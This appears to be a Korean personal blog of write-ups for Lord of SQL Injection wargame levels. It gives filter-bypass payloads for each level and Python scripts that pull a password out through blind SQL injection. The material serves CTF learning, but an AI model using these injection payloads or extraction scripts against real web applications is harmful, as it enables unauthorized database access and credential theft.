그냥 블로그

solve 조건

if($result['id'] == 'admin') solve("skeleton"); 

id값이 admin이면 해결된다

Query

$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 

 and 1=0; 부분을 주석처리 하면 쉽게 해결된다. #을 이용해 주석처리한다.

목표 SQL쿼리

select id from prob_skeleton where id='guest' and pw='' or id ='admin' # and 1=0

 #삽입으로 인해 뒷 부분이 주석처리된다

URL

los.rubiya.kr/chall/skeleton_a857a5ab24431d6fb4a00577dac0f39c.php?pw=' or id ='admin' %23

solve 조건

if($result['id'] == 'admin') solve("vampire");

id값이 admin 이면 solve("vampire")를 반환한다.

특수문자 제약

if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
$_GET[id] = strtolower($_GET[id]);
$_GET[id] = str_replace("admin","",$_GET[id]); 

싱글쿼터(')를 필터링 하고 대문자 우회를 못 하게만들었다. admin을 ""으로 대체한다.

admin이 사라졌을때 admin으로 나오게만든다.

adminaadmindadminmadminiadminn 초록색 부분이 필터링되고 admin이 된다.

sqlInjection 쿼리

select id from prob_gremlin where id='adminaadmindadminmadminiadminn'

URL

los.rubiya.kr/chall/vampire_e3f1ef853da067db37f342f3a1881156.php?id=adminaadmindadminmadminiadminn

solve 조건

if($result['id'] == 'admin') solve("troll");

id값이 admin이면 해경된다.

특수문자 제약

if(preg_match("/admin/", $_GET[id])) exit("HeHe");

 admin을 필터링한다. MySQL은 기본적으로 대소문자 구분을 안한다. 그것을 이용한다.

sqlInjection 쿼리

select id from prob_gremlin where id='Admin'

 하나를 대문자 처리한다.

URL

los.rubiya.kr/chall/troll_05b5eb65d94daf81c42dd44136cb0063.php?id=Admin

solve 조건

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 

정확한 pw값을 요구하는 문제이다 4번문제랑 동일하다.

특수문자 제약

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

and,or을 사용하지 못 한다. 4번문제 파이썬 코드에 ||,&&으로 바꾸기만 하면 해결된다.

Python code

import requests

URL='https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': 'p68istnh0anectj0ur6ttevv22'}
password = ''
length = 0;

for i in range(100):
    query={'pw': '\' || length(pw) = '+str(i)+' # '}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)
        length=i
        break;
    

for i in range(length):
    for j in range(ord('0'),ord('z')+1):
        query={'pw': '\' || substr(pw,'+str(i+1)+',1) = \'' + chr(j)+ '\'#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;

 4번문제랑 똑같다.

[LOS] orc 풀이 - 4번

URL

los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec

solve 조건

if($result['id'] == 'admin') solve("darkelf"); 

 id값이 admin이면 해결된다.

특수문자 제약

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

목표 SQL 쿼리

select id from prob_gremlin where id='' and pw='' || id = 'admin'

URL

los.rubiya.kr/chall/darkelf_c6a5ed64c4f6a7a5595c24977376136b.php?pw='  || id = 'admin 

solve 조건

if($result['id'] == 'admin') solve("wolfman"); 

id가 admin이면 해결된다

특수문자 제약

if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 

 공백문자를 사용하지 못 한다. /**/로 우회한다.

SQLInjection 쿼리

select id from prob_gremlin where id='' and pw=''/**/or/**/id='admin 

 /**/을 공백대신 사용하였다

URL

los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php?pw='/**/or/**/id='admin  

solve 조건

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");

정확한 pw값를 알아내야 해결할 수 있다.

Blind Injection

Blind Injection은 SQL Injection 공격 시 오류메세지가 출력되지 않을 때 참/거짓을 통해 원하는 DB 정보를 얻어내는 공격기법이다.

해당 문제에서는 블라인들 인젝션을 요구하고 있다.

먼저 참/거짓을 판단할 수 있는 구문을 탐색한다.

if($result['id']) echo "<h2>Hello admin</h2>"; 

 해당 구문을 보자 id값이 있기만하면 Hello admin을 출력해주고 있다. 이를 이용하여 참/거짓을 판단한다.

select id from prob_orc where id='admin' and pw='' or 수식

 id='admin' and pw='' 는 무조건 거짓이다 뒤 수식의 여부에따라 Hello admin을 출력해 줄것이다.

직접 하면 시간이 오래걸리니 Python Code로 작성한다.

길이알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(100):
    query={'pw': '\' or length(pw) = '+str(i)+' # '}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)

select id from prob_orc where id='admin' and pw='' or length(pw) = 숫자

해당 쿼리문을 넘겨주는 파이썬 코드이다. length(pw) = 숫자가 참이라면 Hello admin을 출력할 것이다. 

4와 8을 출력한다. pw의 길이는 4와 8중에 하나이다

pw알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(8):
    for  j in range(ord('0'),ord('z')+1):
        query={'pw': '\' or substr(pw,'+str(i+1)+',1) = \'' + chr(j) + '\'#' }
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;

select id from prob_orc where id='admin' and pw='' or substr(pw,n번째문자,1)

길이를 8로해서 돌렸다. substr은 문자열을 분리하여 원하는 위치에 문자열을 가져오게 해준다.

 095A9852 값이 나왔다.

 A값이 소문자로 입력해야 정답으로 인정되는데 원인을 아직 모르겠다.

URL

los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=095a9852

solve 조건

 if($result['id'] == 'admin') solve("goblin");

 id가 admin이면 해결된다.

특수문자 제약

 if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
 if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); 

 쿼터 문자들을 필터링한다. 

sqlInjection 쿼리

select id from prob_gremlin where id='' and pw='' or true #'

 형태로 공격을 시도 할 것이다.

 해당 php는 get형식으로 쿼리를 받고있어 sql 인젝션이 가능하다.

admin=0x61646d696e

URL

?no=-1 or admin=0x61646d696e

Injection 결과

select id from prob_goblin where id='guest' and no=123 or id=0x61646d696e